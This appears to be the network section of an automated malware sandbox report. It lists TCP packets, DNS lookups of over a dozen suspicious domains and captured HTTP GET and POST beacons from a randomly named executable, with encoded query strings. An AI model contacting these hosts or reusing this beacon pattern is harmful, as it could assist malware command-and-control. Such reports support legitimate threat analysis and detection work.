                                                  Sep 16, 2024 09:40:32.607336044 CEST4974080192.168.2.584.32.84.32
                                                  Sep 16, 2024 09:40:32.612112045 CEST804974084.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:33.098380089 CEST804974084.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:33.098412991 CEST804974084.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:33.098427057 CEST804974084.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:33.098500013 CEST4974080192.168.2.584.32.84.32
                                                  Sep 16, 2024 09:40:33.098520994 CEST804974084.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:33.098532915 CEST804974084.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:33.098545074 CEST804974084.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:33.098555088 CEST804974084.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:33.098557949 CEST4974080192.168.2.584.32.84.32
                                                  Sep 16, 2024 09:40:33.098592043 CEST804974084.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:33.098603010 CEST804974084.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:33.098640919 CEST4974080192.168.2.584.32.84.32
                                                  Sep 16, 2024 09:40:33.098685980 CEST4974080192.168.2.584.32.84.32
                                                  Sep 16, 2024 09:40:33.098695993 CEST804974084.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:33.098735094 CEST4974080192.168.2.584.32.84.32
                                                  Sep 16, 2024 09:40:33.104295015 CEST4974080192.168.2.584.32.84.32
                                                  Sep 16, 2024 09:40:33.109241962 CEST804974084.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:47.193717003 CEST4974180192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:47.198566914 CEST8049741154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:47.198630095 CEST4974180192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:47.215579987 CEST4974180192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:47.220437050 CEST8049741154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:48.170674086 CEST8049741154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:48.170694113 CEST8049741154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:48.170706987 CEST8049741154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:48.170763016 CEST8049741154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:48.170933008 CEST8049741154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:48.170943022 CEST8049741154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:48.170963049 CEST4974180192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:48.171073914 CEST8049741154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:48.171087027 CEST8049741154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:48.171399117 CEST4974180192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:48.171421051 CEST4974180192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:48.729382992 CEST4974180192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:49.748785019 CEST4974280192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:49.754757881 CEST8049742154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:49.756895065 CEST4974280192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:49.773149014 CEST4974280192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:49.778547049 CEST8049742154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:50.724030972 CEST8049742154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:50.724059105 CEST8049742154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:50.724097013 CEST4974280192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:50.724909067 CEST8049742154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:50.724920034 CEST8049742154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:50.724931955 CEST8049742154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:50.724958897 CEST8049742154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:50.724966049 CEST4974280192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:50.724972963 CEST8049742154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:50.725014925 CEST4974280192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:51.276144028 CEST4974280192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:52.296681881 CEST4974380192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:52.302975893 CEST8049743154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:52.303131104 CEST4974380192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:52.314702988 CEST4974380192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:52.320363998 CEST8049743154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:52.320413113 CEST8049743154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:53.450965881 CEST8049743154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:53.450989962 CEST8049743154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:53.450994968 CEST8049743154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:53.450999022 CEST8049743154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:53.451006889 CEST8049743154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:53.451009989 CEST8049743154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:53.451047897 CEST8049743154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:53.451119900 CEST8049743154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:53.451133013 CEST8049743154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:53.451272964 CEST4974380192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:53.451277971 CEST4974380192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:53.823040009 CEST4974380192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:54.843424082 CEST4974480192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:54.849472046 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:54.849560022 CEST4974480192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:54.858746052 CEST4974480192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:54.863647938 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:55.801822901 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:55.801841021 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:55.801850080 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:55.801861048 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:55.801872015 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:55.801882029 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:55.801919937 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:55.801930904 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:55.801940918 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:55.801949978 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:55.803698063 CEST4974480192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:55.808562040 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:55.808573961 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:55.808583975 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:55.812848091 CEST4974480192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:56.024595022 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:56.024612904 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:56.024668932 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:56.024681091 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:56.024691105 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:56.024935961 CEST4974480192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:56.025010109 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:56.025144100 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:56.025252104 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:56.025270939 CEST4974480192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:56.025288105 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:56.025374889 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:40:56.026779890 CEST4974480192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:56.032697916 CEST4974480192.168.2.5154.23.176.197
                                                  Sep 16, 2024 09:40:56.037518024 CEST8049744154.23.176.197192.168.2.5
                                                  Sep 16, 2024 09:41:01.470941067 CEST4974580192.168.2.562.149.128.40
                                                  Sep 16, 2024 09:41:01.476011038 CEST804974562.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:01.476099014 CEST4974580192.168.2.562.149.128.40
                                                  Sep 16, 2024 09:41:01.486906052 CEST4974580192.168.2.562.149.128.40
                                                  Sep 16, 2024 09:41:01.491998911 CEST804974562.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:02.161469936 CEST804974562.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:02.161495924 CEST804974562.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:02.161513090 CEST804974562.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:02.161528111 CEST804974562.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:02.161544085 CEST804974562.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:02.161561012 CEST804974562.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:02.161581993 CEST4974580192.168.2.562.149.128.40
                                                  Sep 16, 2024 09:41:02.162925005 CEST4974580192.168.2.562.149.128.40
                                                  Sep 16, 2024 09:41:02.994915962 CEST4974580192.168.2.562.149.128.40
                                                  Sep 16, 2024 09:41:04.016732931 CEST4974680192.168.2.562.149.128.40
                                                  Sep 16, 2024 09:41:04.021915913 CEST804974662.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:04.024871111 CEST4974680192.168.2.562.149.128.40
                                                  Sep 16, 2024 09:41:04.036267042 CEST4974680192.168.2.562.149.128.40
                                                  Sep 16, 2024 09:41:04.041205883 CEST804974662.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:04.709839106 CEST804974662.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:04.709862947 CEST804974662.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:04.709878922 CEST804974662.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:04.709893942 CEST804974662.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:04.709908962 CEST804974662.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:04.709924936 CEST804974662.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:04.709925890 CEST4974680192.168.2.562.149.128.40
                                                  Sep 16, 2024 09:41:04.709980011 CEST4974680192.168.2.562.149.128.40
                                                  Sep 16, 2024 09:41:05.541830063 CEST4974680192.168.2.562.149.128.40
                                                  Sep 16, 2024 09:41:06.559864044 CEST4974780192.168.2.562.149.128.40
                                                  Sep 16, 2024 09:41:06.564754009 CEST804974762.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:06.567806959 CEST4974780192.168.2.562.149.128.40
                                                  Sep 16, 2024 09:41:06.579729080 CEST4974780192.168.2.562.149.128.40
                                                  Sep 16, 2024 09:41:06.584556103 CEST804974762.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:06.584611893 CEST804974762.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:07.235972881 CEST804974762.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:07.235990047 CEST804974762.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:07.236000061 CEST804974762.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:07.236010075 CEST804974762.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:07.236021042 CEST804974762.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:07.236042023 CEST804974762.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:07.236053944 CEST4974780192.168.2.562.149.128.40
                                                  Sep 16, 2024 09:41:07.236109018 CEST4974780192.168.2.562.149.128.40
                                                  Sep 16, 2024 09:41:08.098728895 CEST4974780192.168.2.562.149.128.40
                                                  Sep 16, 2024 09:41:09.110044003 CEST4974880192.168.2.562.149.128.40
                                                  Sep 16, 2024 09:41:09.201560020 CEST804974862.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:09.201631069 CEST4974880192.168.2.562.149.128.40
                                                  Sep 16, 2024 09:41:09.210674047 CEST4974880192.168.2.562.149.128.40
                                                  Sep 16, 2024 09:41:09.215864897 CEST804974862.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:09.875648975 CEST804974862.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:09.875668049 CEST804974862.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:09.875679970 CEST804974862.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:09.875689030 CEST804974862.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:09.875705957 CEST804974862.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:09.875715971 CEST804974862.149.128.40192.168.2.5
                                                  Sep 16, 2024 09:41:09.876719952 CEST4974880192.168.2.562.149.128.40
                                                  Sep 16, 2024 09:41:09.880225897 CEST4974880192.168.2.562.149.128.40
                                                  Sep 16, 2024 09:41:09.885060072 CEST804974862.149.128.40192.168.2.5
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Sep 16, 2024 09:38:01.255412102 CEST5135253192.168.2.51.1.1.1
                                                  Sep 16, 2024 09:38:01.265049934 CEST53513521.1.1.1192.168.2.5
                                                  Sep 16, 2024 09:38:06.280266047 CEST4927653192.168.2.51.1.1.1
                                                  Sep 16, 2024 09:38:06.314523935 CEST53492761.1.1.1192.168.2.5
                                                  Sep 16, 2024 09:38:23.467473984 CEST5166453192.168.2.51.1.1.1
                                                  Sep 16, 2024 09:38:23.905695915 CEST53516641.1.1.1192.168.2.5
                                                  Sep 16, 2024 09:38:37.482906103 CEST6024953192.168.2.51.1.1.1
                                                  Sep 16, 2024 09:38:37.736737967 CEST53602491.1.1.1192.168.2.5
                                                  Sep 16, 2024 09:39:11.764502048 CEST5934353192.168.2.51.1.1.1
                                                  Sep 16, 2024 09:39:12.192517996 CEST53593431.1.1.1192.168.2.5
                                                  Sep 16, 2024 09:39:25.764261007 CEST6277153192.168.2.51.1.1.1
                                                  Sep 16, 2024 09:39:25.776603937 CEST53627711.1.1.1192.168.2.5
                                                  Sep 16, 2024 09:39:41.938661098 CEST5414553192.168.2.51.1.1.1
                                                  Sep 16, 2024 09:39:41.953152895 CEST53541451.1.1.1192.168.2.5
                                                  Sep 16, 2024 09:39:50.062906981 CEST5220553192.168.2.51.1.1.1
                                                  Sep 16, 2024 09:39:50.182137012 CEST53522051.1.1.1192.168.2.5
                                                  Sep 16, 2024 09:40:03.310873985 CEST4921853192.168.2.51.1.1.1
                                                  Sep 16, 2024 09:40:03.473642111 CEST53492181.1.1.1192.168.2.5
                                                  Sep 16, 2024 09:40:16.812474966 CEST5193253192.168.2.51.1.1.1
                                                  Sep 16, 2024 09:40:16.821861982 CEST53519321.1.1.1192.168.2.5
                                                  Sep 16, 2024 09:40:24.889445066 CEST5276453192.168.2.51.1.1.1
                                                  Sep 16, 2024 09:40:24.945646048 CEST53527641.1.1.1192.168.2.5
                                                  Sep 16, 2024 09:40:38.123594999 CEST6202153192.168.2.51.1.1.1
                                                  Sep 16, 2024 09:40:39.100420952 CEST53620211.1.1.1192.168.2.5
                                                  Sep 16, 2024 09:40:47.156325102 CEST5778553192.168.2.51.1.1.1
                                                  Sep 16, 2024 09:40:47.189871073 CEST53577851.1.1.1192.168.2.5
                                                  Sep 16, 2024 09:41:01.046601057 CEST6201453192.168.2.51.1.1.1
                                                  Sep 16, 2024 09:41:01.468385935 CEST53620141.1.1.1192.168.2.5
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Sep 16, 2024 09:38:01.255412102 CEST192.168.2.51.1.1.10xd23cStandard query (0)www.linkbasic.netA (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:38:06.280266047 CEST192.168.2.51.1.1.10x3a9cStandard query (0)www.chamadaslotgiris.netA (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:38:23.467473984 CEST192.168.2.51.1.1.10xec39Standard query (0)www.masteriocp.onlineA (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:38:37.482906103 CEST192.168.2.51.1.1.10xab11Standard query (0)www.mediaplug.bizA (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:39:11.764502048 CEST192.168.2.51.1.1.10x5d1fStandard query (0)www.independent200.orgA (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:39:25.764261007 CEST192.168.2.51.1.1.10x3043Standard query (0)www.tigre777gg.onlineA (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:39:41.938661098 CEST192.168.2.51.1.1.10xeb40Standard query (0)www.monos.shopA (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:39:50.062906981 CEST192.168.2.51.1.1.10x9b1bStandard query (0)www.personal-loans-jp8.xyzA (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:40:03.310873985 CEST192.168.2.51.1.1.10x974dStandard query (0)www.quantumnests.xyzA (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:40:16.812474966 CEST192.168.2.51.1.1.10x3a53Standard query (0)www.abbabyfernando.onlineA (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:40:24.889445066 CEST192.168.2.51.1.1.10xf282Standard query (0)www.parcelfly.netA (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:40:38.123594999 CEST192.168.2.51.1.1.10x8945Standard query (0)www.siyue.xyzA (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:40:47.156325102 CEST192.168.2.51.1.1.10x6f35Standard query (0)www.shipincheshi.skinA (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:41:01.046601057 CEST192.168.2.51.1.1.10xc84cStandard query (0)www.fimgroup.netA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Sep 16, 2024 09:38:01.265049934 CEST1.1.1.1192.168.2.50xd23cName error (3)www.linkbasic.netnonenoneA (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:38:06.314523935 CEST1.1.1.1192.168.2.50x3a9cNo error (0)www.chamadaslotgiris.netchamadaslotgiris.netCNAME (Canonical name)IN (0x0001)false
                                                  Sep 16, 2024 09:38:06.314523935 CEST1.1.1.1192.168.2.50x3a9cNo error (0)chamadaslotgiris.net3.33.130.190A (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:38:06.314523935 CEST1.1.1.1192.168.2.50x3a9cNo error (0)chamadaslotgiris.net15.197.148.33A (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:38:23.905695915 CEST1.1.1.1192.168.2.50xec39No error (0)www.masteriocp.onlinedns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                  Sep 16, 2024 09:38:23.905695915 CEST1.1.1.1192.168.2.50xec39No error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:38:23.905695915 CEST1.1.1.1192.168.2.50xec39No error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:38:23.905695915 CEST1.1.1.1192.168.2.50xec39No error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:38:37.736737967 CEST1.1.1.1192.168.2.50xab11No error (0)www.mediaplug.biz66.81.203.200A (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:38:37.736737967 CEST1.1.1.1192.168.2.50xab11No error (0)www.mediaplug.biz66.81.203.10A (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:38:37.736737967 CEST1.1.1.1192.168.2.50xab11No error (0)www.mediaplug.biz66.81.203.135A (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:39:12.192517996 CEST1.1.1.1192.168.2.50x5d1fNo error (0)www.independent200.org103.42.108.46A (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:39:25.776603937 CEST1.1.1.1192.168.2.50x3043No error (0)www.tigre777gg.onlinetigre777gg.onlineCNAME (Canonical name)IN (0x0001)false
                                                  Sep 16, 2024 09:39:25.776603937 CEST1.1.1.1192.168.2.50x3043No error (0)tigre777gg.online3.33.130.190A (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:39:25.776603937 CEST1.1.1.1192.168.2.50x3043No error (0)tigre777gg.online15.197.148.33A (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:39:41.953152895 CEST1.1.1.1192.168.2.50xeb40Name error (3)www.monos.shopnonenoneA (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:39:50.182137012 CEST1.1.1.1192.168.2.50x9b1bNo error (0)www.personal-loans-jp8.xyz199.59.243.226A (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:40:03.473642111 CEST1.1.1.1192.168.2.50x974dNo error (0)www.quantumnests.xyz162.0.239.141A (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:40:16.821861982 CEST1.1.1.1192.168.2.50x3a53Name error (3)www.abbabyfernando.onlinenonenoneA (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:40:24.945646048 CEST1.1.1.1192.168.2.50xf282No error (0)www.parcelfly.netparcelfly.netCNAME (Canonical name)IN (0x0001)false
                                                  Sep 16, 2024 09:40:24.945646048 CEST1.1.1.1192.168.2.50xf282No error (0)parcelfly.net84.32.84.32A (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:40:47.189871073 CEST1.1.1.1192.168.2.50x6f35No error (0)www.shipincheshi.skin154.23.176.197A (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:40:47.189871073 CEST1.1.1.1192.168.2.50x6f35No error (0)www.shipincheshi.skin154.23.176.232A (IP address)IN (0x0001)false
                                                  Sep 16, 2024 09:41:01.468385935 CEST1.1.1.1192.168.2.50xc84cNo error (0)www.fimgroup.netfimgroup.netCNAME (Canonical name)IN (0x0001)false
                                                  Sep 16, 2024 09:41:01.468385935 CEST1.1.1.1192.168.2.50xc84cNo error (0)fimgroup.net62.149.128.40A (IP address)IN (0x0001)false
                                                  • www.chamadaslotgiris.net
                                                  • www.masteriocp.online
                                                  • www.mediaplug.biz
                                                  • www.independent200.org
                                                  • www.tigre777gg.online
                                                  • www.personal-loans-jp8.xyz
                                                  • www.quantumnests.xyz
                                                  • www.parcelfly.net
                                                  • www.shipincheshi.skin
                                                  • www.fimgroup.net
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.5497123.33.130.190802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:38:06.338335037 CEST532OUTGET /gqyt/?prutfR_P=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQykA5Xt3rjq5i1um85DwW90kuO6Jainieo24Gz0Ls55ZIPYw==&u8b=M0MH_xux6 HTTP/1.1
                                                  Host: www.chamadaslotgiris.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Sep 16, 2024 09:38:08.413790941 CEST410INHTTP/1.1 200 OK
                                                  Server: openresty
                                                  Date: Mon, 16 Sep 2024 07:38:07 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 270
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 70 72 75 74 66 52 5f 50 3d 4e 5a 65 53 70 2f 4d 38 42 6b 49 4c 44 6d 78 6a 6f 52 36 45 48 79 72 45 32 6b 67 37 68 48 50 52 47 69 66 7a 30 2f 74 6d 56 69 32 62 31 6f 56 4f 35 4e 65 48 65 4c 32 75 6c 7a 4f 6e 66 34 49 79 32 63 74 6a 45 76 53 38 33 34 77 30 35 67 4d 73 36 4d 51 79 6b 41 35 58 74 33 72 6a 71 35 69 31 75 6d 38 35 44 77 57 39 30 6b 75 4f 36 4a 61 69 6e 69 65 6f 32 34 47 7a 30 4c 73 35 35 5a 49 50 59 77 3d 3d 26 75 38 62 3d 4d 30 4d 48 5f 78 75 78 36 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?prutfR_P=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQykA5Xt3rjq5i1um85DwW90kuO6Jainieo24Gz0Ls55ZIPYw==&u8b=M0MH_xux6"}</script></head></html>
                                                  Sep 16, 2024 09:38:08.413826942 CEST410INHTTP/1.1 200 OK
                                                  Server: openresty
                                                  Date: Mon, 16 Sep 2024 07:38:07 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 270
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 70 72 75 74 66 52 5f 50 3d 4e 5a 65 53 70 2f 4d 38 42 6b 49 4c 44 6d 78 6a 6f 52 36 45 48 79 72 45 32 6b 67 37 68 48 50 52 47 69 66 7a 30 2f 74 6d 56 69 32 62 31 6f 56 4f 35 4e 65 48 65 4c 32 75 6c 7a 4f 6e 66 34 49 79 32 63 74 6a 45 76 53 38 33 34 77 30 35 67 4d 73 36 4d 51 79 6b 41 35 58 74 33 72 6a 71 35 69 31 75 6d 38 35 44 77 57 39 30 6b 75 4f 36 4a 61 69 6e 69 65 6f 32 34 47 7a 30 4c 73 35 35 5a 49 50 59 77 3d 3d 26 75 38 62 3d 4d 30 4d 48 5f 78 75 78 36 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?prutfR_P=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQykA5Xt3rjq5i1um85DwW90kuO6Jainieo24Gz0Ls55ZIPYw==&u8b=M0MH_xux6"}</script></head></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.54971313.228.81.39802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:38:23.925378084 CEST797OUTPOST /p5rq/ HTTP/1.1
                                                  Host: www.masteriocp.online
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 209
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.masteriocp.online
                                                  Referer: http://www.masteriocp.online/p5rq/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
